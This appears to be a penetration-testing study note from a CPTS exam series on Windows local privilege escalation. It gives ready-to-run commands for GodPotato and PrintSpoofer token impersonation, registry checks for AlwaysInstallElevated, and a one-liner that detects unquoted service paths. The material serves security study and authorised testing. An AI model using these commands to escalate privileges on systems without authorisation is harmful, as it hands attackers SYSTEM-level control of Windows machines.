Windows Local Privilege Escalation & LOLBAS
Local Windows privilege escalation vectors: Token impersonation (Potato exploits), Unquoted Service Paths, AlwaysInstallElevated, and LOLBAS.
winpeasgodpotatoprintspoofercertutilpowershell
On Windows, service accounts frequently hold privileges like SeImpersonatePrivilege that permit direct escalation to NT AUTHORITY\SYSTEM.
1. Token Impersonation Exploits
If whoami /priv reveals SeImpersonatePrivilege:
- GodPotato (Windows Server 2012-2022):
GodPotato-NET4.exe -cmd "cmd.exe /c whoami"
- PrintSpoofer (Named pipe print spooler impersonation):
PrintSpoofer64.exe -i -c cmd
2. AlwaysInstallElevated Registry Keys
Check if MSI installers run with elevated permissions:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
3. Unquoted Service Paths
Detect unquoted service binary paths containing spaces:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Stage binaries using 11. Offensive File Transfers Across Restricted Networks, then pivot toward domain control via 06. Active Directory Attack Paths & Domain Enumeration.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 06. Active Directory Attack Paths & Domain Enumeration
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 08. Active Directory Certificate Services (AD CS) Abuse
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox